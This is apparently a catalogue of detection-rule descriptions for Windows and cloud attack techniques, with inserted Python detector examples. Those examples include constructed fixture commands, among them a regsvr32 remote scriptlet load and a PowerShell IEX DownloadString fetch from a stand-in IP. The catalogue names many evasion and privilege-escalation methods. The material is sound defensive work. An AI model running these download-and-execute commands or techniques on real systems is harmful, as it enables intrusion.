Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute
Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.
Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant them higher permissions on specific files and folders
Use the Internet Explorer registry key to hide a script
BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
Uses the .NET InstallUtil.exe application in order to execute an image without logging
Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.
Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
Deletion of log files is a known anti-forensic technique
PowerShell Remove-Item with -Path to delete a file, or a folder with “-Recurse”
Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.
PowerShell using the -PassThru option to start a process in the background
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
Detects suspicious command line patterns used when rundll32 is used to run JavaScript code
Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion
Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying to manipulate the configuration
Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and an IP address rather than an FQDN
Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system
Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed, or a dump file is moved or copied to a different name
Detection of sc.exe utility adding a new service with special permission which hides that service.
Renamed as a legitimate Sysinternals Suite tool to evade detection
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.
Utilizes REGSVR32.exe to execute this DLL masquerading as an image file
Extract data from cab file and hide it in an alternate data stream
Download or Copy file with Extrac32
Extexport.exe loads a DLL and is executed from a folder other than its original path
Compress the target file into a cab file stored in an Alternate Data Stream (ADS) of the target file.
Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
Performs execution of a specified file; can be used for defense evasion.
Execute C# code with the Build Provider and proper folder structure in place.
Detects shell32.dll executing a DLL in a suspicious directory
Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal
Detects a suspicious command line that removes an exe or dll
Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe
Detects using WorkFolders.exe to execute an arbitrary control.exe
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
Attempts to detect registry events for common NetWire key HKCU\Software\NetWire
Detects the deletion of registry keys containing the MSTSC connection history
Detects disabling Windows Defender Real-Time Protection by modifying registry
Detects when a user disables the Windows Firewall via a Profile to help evade defense.
Detects the deletion of a prefetch file (AntiForensic)
Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll
Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
Detects embedding of files with usage of the steghide binary; adversaries may use this technique to prevent the detection of hidden information.
Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
Detects the pattern of UAC Bypass using computerdefaults.exe (UACMe 59)
Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to hide the process of exfiltrating data. With this enabled, an organization loses visibility into data such as query type, response and originating IP that are used to identify bad actors.
Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit
Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.
Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32
Detects indicators of a UAC bypass method by mocking directories
This detection uses AzureActivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid Health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The Health AD FS service can then be deleted once it is no longer needed via HTTP requests to Azure.
This detection uses AzureActivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.
Detects suspicious Splwow64.exe process without any command line parameters
Detects the pattern of a pipe name as used by the tool EfsPotato
PowerUp's Write Hijack DLL exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes the malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).
Detects uses of the SysInternals Procdump utility
Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).
Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows
Detects attempts to evade Amazon Macie detection.
Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.
Detects a regsvr32.exe execution that doesn't contain a DLL in the command line
Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
Detects a suspicious reg.exe invocation that looks as if it would disable an important security service
RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).
Detects the Setting of Windows Defender Exclusions
Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
Detects the modification of the findings on SecurityHub.
Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
Detects conhost execution as a parent process. Can be used to evade defense mechanisms.
Windows Defender logs when the history of detected infections is deleted. Log file will contain the message “Windows Defender Antivirus has removed history of malware and other potentially unwanted software”.
Detects specific process characteristics of Winnti Pipemon malware reported by ESET
Detects user agent and URI paths used by empire agents
Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time
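As an added illustration (not code from any of the rules above), here is a small parser that applies the regsvr32 checks from this entry and from the earlier one on /s /n /u /i:http://<IP>: it flags /i without /n, a scriptlet fetched over the network, plain HTTP to a bare IP address, and scrobj.dll as the registered DLL. The command lines are constructed for the example and the finding labels are my own.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Windows-style tokenizer: keeps "quoted parts" together and leaves backslashes alone.
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')

# Constructed sample process-creation command lines (not real incident data).
SAMPLES = [
    r'regsvr32.exe /s /n /u /i:http://192.0.2.10/payload.sct scrobj.dll',
    r'regsvr32.exe /s /i:https://updates.example.com/x.sct scrobj.dll',
    r'regsvr32.exe /s "C:\Program Files\Common Files\msxml3.dll"',
    r'regsvr32.exe /s /i C:\Temp\evil.dll',
]


def parse_regsvr32(cmdline):
    """Split a regsvr32 command line into switches and positional arguments.

    Switches are /x or -x (case-insensitive); /i may carry an argument joined
    with ':' as in /i:http://host/file.sct.  tokens[0] is the executable.
    """
    tokens = TOKEN_RE.findall(cmdline)
    switches, positional = {}, []
    for tok in tokens[1:]:
        if tok[:1] in ('/', '-'):
            name, sep, arg = tok[1:].partition(':')
            switches[name.lower()] = arg.strip('"') if sep else None
        else:
            positional.append(tok.strip('"'))
    return switches, positional


def analyse_regsvr32(cmdline):
    """Return the anomalies found in one regsvr32 command line, in a fixed order."""
    switches, positional = parse_regsvr32(cmdline)
    findings = []
    if 'i' in switches and 'n' not in switches:
        findings.append('i_without_n')        # /i normally comes with /n (skip DllRegisterServer)
    url = urlparse(switches.get('i') or '')
    if url.scheme in ('http', 'https'):
        findings.append('remote_install')     # DllInstall argument is a URL
        try:
            ip_address(url.hostname or '')
            host_is_ip = True
        except ValueError:
            host_is_ip = False
        if url.scheme == 'http' and host_is_ip:
            findings.append('http_to_ip')     # cleartext fetch from a bare IP, no FQDN
    if any(p.lower().endswith('scrobj.dll') for p in positional):
        findings.append('scrobj')             # scriptlet host DLL
    return findings


if __name__ == '__main__':
    for line in SAMPLES:
        print(analyse_regsvr32(line), '<-', line)
```

The tokenizer is deliberately not shlex: in POSIX mode shlex eats the backslashes of Windows paths, and in non-POSIX mode it splits a quoted argument that starts mid-token.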
Detects disabling security tools
Detects setting proxy
Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020
Detects a command line process that uses explorer.exe /root, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer
Detects disabling Windows Defender threat protection
Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020
Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048
Detects suspicious network connection by Notepad
Detects a process memory dump performed via ordinal function 24 in comsvcs.dll
Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.
Detects a method that uses Wsreset.exe tool that can be used to reset the Windows Store to bypass UAC
Detects suspicious FromBase64String expressions in command line arguments
Detects suspicious process injection using ZOHO’s dctask64.exe
Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation
Detects AWS Config Service disabling
Detects disabling, deleting and updating of a Trail
Detects events generated by Windows to indicate the exploitation of a known vulnerability (e.g. CVE-2020-0601)
The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Detects activity mentioned in Operation Wocao report
Detects the execution of a renamed ProcDump executable often used by attackers or malware
See what files are being deleted from flash file systems
Turn off logging locally or remotely
Show when private keys are being exported from the device, or when new certificates are installed
Clear command history in network OS which is used for defense evasion
Detects suspicious msiexec process starts in an uncommon directory
Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Offensive tradecraft is switching away from using APIs like “CreateRemoteThread”, however, this is still largely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.
Detects a possible EDR and SIEM bypass via an abnormal user account name.
Detects DLL hijacking of the IKEEXT and SessionEnv services, which call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services (“svchost.exe -k netsvcs”) to gain code execution on a remote machine.
Detect download by BITS jobs via PowerShell
Identifies suspicious mshta.exe commands.
Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.
Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).
Identifies usage of hh.exe executing recently modified .chm files.
Detect child processes of automatically elevated instances of Microsoft Connection Manager Profile Installer (cmstp.exe).
Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
Execute C# code located in the consoleapp folder
Launch 64-bit shellcode from a debugger script file using cdb.exe.
Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender
Detects execution of Dxcap.exe
Execute VBscript code that is referenced within the *.bgi file.
Detects defence evasion attempt via odbcconf.exe execution to load DLL
Detects network connections and DNS queries initiated by Regsvr32.exe
Detect changes of syslog daemons configuration files
Detect changes in auditd configuration files
Detects potential malicious modification of the property value of fDenyTSConnections and UserAuthentication to enable remote desktop connections.
Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
Detects WRITE_DAC access to a domain object
Detects removing immutable file attribute.
Detects a file or folder’s permissions being modified.
Detects file and folder permission changes.
Detect possible Sysmon driver unload
OpenWith.exe executes another binary
Devtoolslauncher.exe executes another binary
Detects suspicious calls of DLL exports by ordinal via rundll32.exe
Detects a code page switch in command line or batch scripts to a rare language
Detects all Emotet like process executions that are not covered by the more generic rules
Detects the malicious use of a control panel item
Detects the execution of a renamed PowerShell often used by attackers or malware
Detects a suspicious child process of userinit
Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
Detects the execution of a renamed PsExec often used by attackers or malware
Detects registry keys created in OceanLotus (also known as APT32) attacks
Clear command history in linux which is used for defense evasion.
Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
Detects activity that could be related to Baby Shark malware
Detects svchost hosting RDP termsvcs communicating with the loopback address
Detects a suspicious child process of a Windows shell
Detects the creation of a process from Windows task manager
Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we’re also able to catch cases in which the attacker has renamed the procdump executable.
Detects suspicious uses of the SysInternals Procdump utility by using the special command line parameters '-ma' and '-accepteula' in a single step. This way we're also able to catch cases in which the attacker has renamed the procdump executable.
Detects a suspicious svchost process start
Detects suspicious process related to rasdial.exe
Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
Detects suspicious process that use escape characters
Detects a suspicious Microsoft certutil execution with sub commands like ‘decode’, which is sometimes used to decode malicious code with the built-in certutil utility
Detects various anomalies in relation to regsvr32.exe
Detects Base64 encoded Shellcode
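Added example (my own code, not a rule from this corpus) that shows one way to act on this entry and on the FromBase64String entry above: every long base64 run in a command line is decoded, its first bytes are compared with the metasploit-style cld;call (x86) and cld;and rsp,-16 (x64) prologues, and UTF-16LE text (the -EncodedCommand form) is re-analysed recursively so that a FromBase64String call nested inside the encoded script is still seen. The sample command lines are constructed; the “shellcode” is just the prologue followed by filler bytes, not a real payload.

```python
import base64
import re

# A run of base64 alphabet long enough to be a payload rather than an ordinary word.
B64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')

# Well-known position-independent shellcode prologues (metasploit-style stubs).
X86_PROLOGUE = b'\xfc\xe8'              # cld ; call <next>
X64_PROLOGUE = b'\xfc\x48\x83\xe4\xf0'  # cld ; and rsp, -16


def decode_blob(blob):
    """Strictly decode a base64 run; return None if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


def analyse_cmdline(cmdline, depth=0):
    """Return the set of base64-related indicators found in a command line.

    Each long base64 run is decoded.  Bytes starting with a known shellcode
    prologue are reported; bytes that decode to printable UTF-16LE text (the
    -EncodedCommand form) are analysed again so nested blobs are not missed.
    """
    findings = set()
    if 'frombase64string' in cmdline.lower():
        findings.add('frombase64string')
    for blob in B64_RE.findall(cmdline):
        raw = decode_blob(blob)
        if raw is None:
            continue
        if raw.startswith((X86_PROLOGUE, X64_PROLOGUE)):
            findings.add('shellcode_prologue')
        try:
            text = raw.decode('utf-16-le')
        except UnicodeDecodeError:
            continue
        if text.isprintable() and depth < 3:
            findings.add('encoded_command')
            findings |= analyse_cmdline(text, depth + 1)
    return findings


def _b64(data):
    return base64.b64encode(data).decode('ascii')


# Constructed samples, no real payloads: the "nested" line is an -enc script that
# itself holds a base64 blob whose bytes begin with the x64 stub prologue.
FAKE_SHELLCODE = X64_PROLOGUE + bytes(range(40))
INNER_SCRIPT = "$b=[Convert]::FromBase64String('%s')" % _b64(FAKE_SHELLCODE)
SAMPLES = {
    'nested': 'powershell.exe -nop -w hidden -enc ' + _b64(INNER_SCRIPT.encode('utf-16-le')),
    'benign_enc': 'powershell.exe -enc '
                  + _b64('Write-Host "scheduled maintenance script running"'.encode('utf-16-le')),
    'plain': 'powershell.exe -c Get-Process',
}


if __name__ == '__main__':
    for name, line in SAMPLES.items():
        print(name, sorted(analyse_cmdline(line)))
```

The prologue check only catches raw stubs that were base64-encoded as-is; a payload wrapped in another layer (XOR, gzip, a .NET byte array literal) needs the corresponding unwrapping before the comparison.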
Detects Request to amsiInitFailed that can be used to disable AMSI Scanning
Detects execution of executables that can be used to bypass Applocker whitelisting
Detects a ping command that uses a hex encoded IP address
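Added example, not from the rule itself: Windows ping accepts the inet_aton integer forms (0x7f000001, 2130706433, 0177.0.0.1, 0xC0.0x0.0x2.0xA). The decoder below normalises such a target to dotted-quad and reports the pair when the original spelling differs, so the alert carries the real destination. The sample command lines are constructed.

```python
import ipaddress
import re

PING_EXE_RE = re.compile(r'(?:.*\\)?ping(?:\.exe)?', re.IGNORECASE)


def decode_ip_literal(token):
    """Decode the inet_aton-style forms ping accepts into dotted-quad notation.

    Accepted: a single 32-bit number (decimal, 0-prefixed octal, 0x hex) or
    2/3/4 dotted parts where the last part fills the remaining bytes and each
    part may itself be decimal, octal or hex.  Returns None for anything else.
    """
    parts = token.split('.')
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        try:
            if p[:2].lower() == '0x':
                nums.append(int(p[2:], 16))
            elif len(p) > 1 and p[0] == '0':
                nums.append(int(p, 8))
            else:
                nums.append(int(p, 10))
        except ValueError:
            return None
    last_bits = 32 - 8 * (len(nums) - 1)
    if any(n < 0 or n > 255 for n in nums[:-1]) or not 0 <= nums[-1] < (1 << last_bits):
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << last_bits) | nums[-1]
    return str(ipaddress.IPv4Address(value))


def suspicious_ping(cmdline):
    """Return (raw target, decoded dotted-quad) when ping's target is obfuscated."""
    tokens = cmdline.split()
    if len(tokens) < 2 or not PING_EXE_RE.fullmatch(tokens[0].strip('"')):
        return None
    target = tokens[-1]                      # ping takes the host as its last argument
    decoded = decode_ip_literal(target)
    if decoded is None or decoded == target:
        return None
    return target, decoded


# Constructed sample command lines.
SAMPLES = [
    'ping 0x7f000001',
    'ping.exe -n 1 2130706433',
    'PING 0177.0.0.1',
    r'C:\Windows\System32\PING.EXE -n 2 0xC0.0x0.0x2.0xA',
    'ping 0x7f.1',
    'ping -n 1 192.0.2.10',
    'ping example.com',
]


if __name__ == '__main__':
    for line in SAMPLES:
        print(suspicious_ping(line), '<-', line)
```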
Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil
Detects suspicious msiexec process starts with web addresses as parameter
Detects MSHTA.EXE spawned by SVCHOST as seen in LethalHTA and described in report
Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
Detects usage of attrib.exe to hide files from users.
Detects the creation of an executable with a system process name in a suspicious folder
Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location
Detects typical Dridex process patterns
Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll
Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons
Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
Detects Malleable OneDrive Profile
Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Detects PowerShell remote thread creation in Rundll32.exe
Detects NetNTLM downgrade attack
Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
Detects a specific tool and export used by EquationGroup
Detects scenarios where system auditing (i.e. Windows event log auditing) is disabled. This may be used where an entity wants to bypass local logging to evade detection when Windows event logging is enabled and reviewed. It is also recommended to turn off “Local Group Policy Object Processing” via GPO, which ensures that Active Directory GPOs take precedence over local computer policies edited via tools such as “gpedit.msc”. Note that disabling “Local Group Policy Object Processing” may cause issues for one-off local GPO modifications; it is recommended to perform such modifications in Active Directory anyway.
Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
Detects a ZxShell start by the called and well-known function name
Detects renaming of a file during deletion with the SDelete tool.
This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded
Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
Detects backup catalog deletions
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
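Added example, not from the rule: Windows PowerShell engine lifecycle events (Event ID 400) carry HostVersion and EngineVersion in their Details block. The parser below reads those fields from constructed sample messages and reports an engine major version lower than the host's, plus an explicit -version 2 switch in HostApplication. The message bodies are constructed to mirror the Details layout of those events; the values in them are invented.

```python
import re

# Constructed Windows PowerShell EID 400 message bodies (not real log data).
DOWNGRADE_EVENT = """Engine state is changed from None to Available.

Details:
\tNewEngineState=Available
\tPreviousEngineState=None

\tSequenceNumber=13

\tHostName=ConsoleHost
\tHostVersion=5.1.19041.1
\tHostApplication=powershell.exe -version 2 -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/x')
\tEngineVersion=2.0
\tRunspaceId=
\tCommandLine="""

# Same event as it looks when the 5.1 engine is used (no downgrade).
NORMAL_EVENT = (DOWNGRADE_EVENT
                .replace('EngineVersion=2.0', 'EngineVersion=5.1.19041.1')
                .replace('-version 2 ', ''))

FIELD_RE = re.compile(r'^\s*(\w+)=(.*?)\s*$', re.MULTILINE)


def parse_engine_event(message):
    """Turn the Details block of an EID 400/403 message into a dict of field -> value."""
    return {m.group(1): m.group(2) for m in FIELD_RE.finditer(message)}


def version_tuple(text):
    return tuple(int(p) for p in text.split('.'))


def downgrade_indicators(message):
    """Return indicators that the engine was started below the host's version."""
    fields = parse_engine_event(message)
    try:
        host = version_tuple(fields['HostVersion'])
        engine = version_tuple(fields['EngineVersion'])
    except (KeyError, ValueError):
        return []
    out = []
    if engine[0] < host[0]:                       # e.g. host 5.x running engine 2.0
        out.append('engine_%d_under_host_%d' % (engine[0], host[0]))
    if re.search(r'-v(?:ersion)?\s+2(?:\.0)?\b', fields.get('HostApplication', ''), re.I):
        out.append('explicit_version_2_switch')  # corroborating -version 2 on the command line
    return out


if __name__ == '__main__':
    print(downgrade_indicators(DOWNGRADE_EVENT))
    print(downgrade_indicators(NORMAL_EVENT))
```

Comparing major versions rather than testing for the literal string "2.0" also covers the case where the engine field is rendered as 2.0.0.0, which some collectors do.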
Detects UAC bypass method using Windows event viewer
Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
Detects Windows PowerShell Web Access
This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and make network connections. One could easily make the DLL spawn a new process and inject into it to proxy the network connection and bypass this rule.
Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN
Monitors for the hiding of possibly malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privilege to be written to and executed from.
Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
Detects deinstallation of security products using WMIC utility
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e. js, vbs, etc.).
Detects Winword.exe loading of a custom DLL via the /l command line switch
Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Hong Kong universities
Detect DLL deletions from Spooler Service driver folder
Detect DLL Load from Spooler Service backup folder
Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.
Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used with UseLogonCredential to manipulate the caching credentials.
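Added example covering this entry and the earlier UseLogonCredential, fDenyTSConnections/UserAuthentication, NetNTLM downgrade and Defender Real-Time Protection/exclusion entries: a lookup over Sysmon Event ID 13 (registry value set) records. The events, the rule table and the labels are constructed for the example; LmCompatibilityLevel 0 to 2 is treated as the NetNTLM downgrade indicator because those levels allow LM/NTLMv1 responses.

```python
import re

# Sysmon renders DWORD data as "DWORD (0x00000001)".
DWORD_RE = re.compile(r'DWORD\s*\((0x[0-9a-f]+)\)', re.IGNORECASE)

# (key path suffix, value name) -> (values that indicate tampering, label).
# Key suffixes are matched case-insensitively against the end of the key path.
RULES = {
    (r'control\securityproviders\wdigest', 'uselogoncredential'): ({1}, 'wdigest_cleartext_creds'),
    (r'control\securityproviders\wdigest', 'iscredguardenabled'): ({0}, 'credguard_disabled'),
    (r'control\terminal server', 'fdenytsconnections'): ({0}, 'rdp_enabled'),
    (r'control\terminal server\winstations\rdp-tcp', 'userauthentication'): ({0}, 'rdp_nla_disabled'),
    (r'control\lsa', 'lmcompatibilitylevel'): ({0, 1, 2}, 'netntlm_downgrade'),
    (r'windows defender\real-time protection', 'disablerealtimemonitoring'): ({1}, 'defender_rtp_disabled'),
}
# Any value written below these keys is itself the indicator, whatever its data.
DEFENDER_EXCLUSIONS = '\\windows defender\\exclusions\\'


def parse_dword(details):
    m = DWORD_RE.search(details or '')
    return int(m.group(1), 16) if m else None


def evaluate(event):
    """Return a label for one Sysmon EID 13 event (TargetObject, Details) or None."""
    target = event['TargetObject']
    if DEFENDER_EXCLUSIONS in target.lower():
        return 'defender_exclusion_added'
    key, _, value_name = target.rpartition('\\')
    key_l, value_l = key.lower(), value_name.lower()
    data = parse_dword(event.get('Details'))
    for (suffix, name), (bad_values, label) in RULES.items():
        if key_l.endswith(suffix) and value_l == name and data in bad_values:
            return label
    return None


def scan(events):
    return [evaluate(e) for e in events]


# Constructed sample events (Sysmon Event ID 13 fields), not real telemetry.
EVENTS = [
    {'TargetObject': r'HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential',
     'Details': 'DWORD (0x00000001)'},
    {'TargetObject': r'HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections',
     'Details': 'DWORD (0x00000000)'},
    {'TargetObject': r'HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel',
     'Details': 'DWORD (0x00000005)'},       # hardened value, not a downgrade
    {'TargetObject': r'HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel',
     'Details': 'DWORD (0x00000000)'},
    {'TargetObject': r'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public',
     'Details': 'DWORD (0x00000000)'},
    {'TargetObject': r'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring',
     'Details': 'DWORD (0x00000001)'},
]


if __name__ == '__main__':
    for event, label in zip(EVENTS, scan(EVENTS)):
        print(label, '<-', event['TargetObject'])
```

Matching on the key suffix rather than the full path keeps the table valid for both HKLM\System\CurrentControlSet and the ControlSet00N aliases Sysmon may report.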
Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
Detects when verclsid.exe is used to run COM object via GUID
Detects using SettingSyncHost.exe to run hijacked binary
Application Virtualization Utility is included with Microsoft Office. We are able to abuse “AppVLP” to execute shell commands. Normally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder or to mark a file as a system file.
Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
Detect scenarios where a potentially unauthorized application or user is modifying the system time.
Attempts to load dismcore.dll after dropping it
Unfixed UAC bypass method on Windows 10. WSReset.exe is a file associated with the Windows Store; it will run a binary referenced from a registry key that is writable from a low-privilege context.
Detects Turla ComRAT patterns
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Detects suspicious requests to Telegram API without the usual Telegram User-Agent
Attempting to disable scheduled scanning and other parts of windows defender atp.
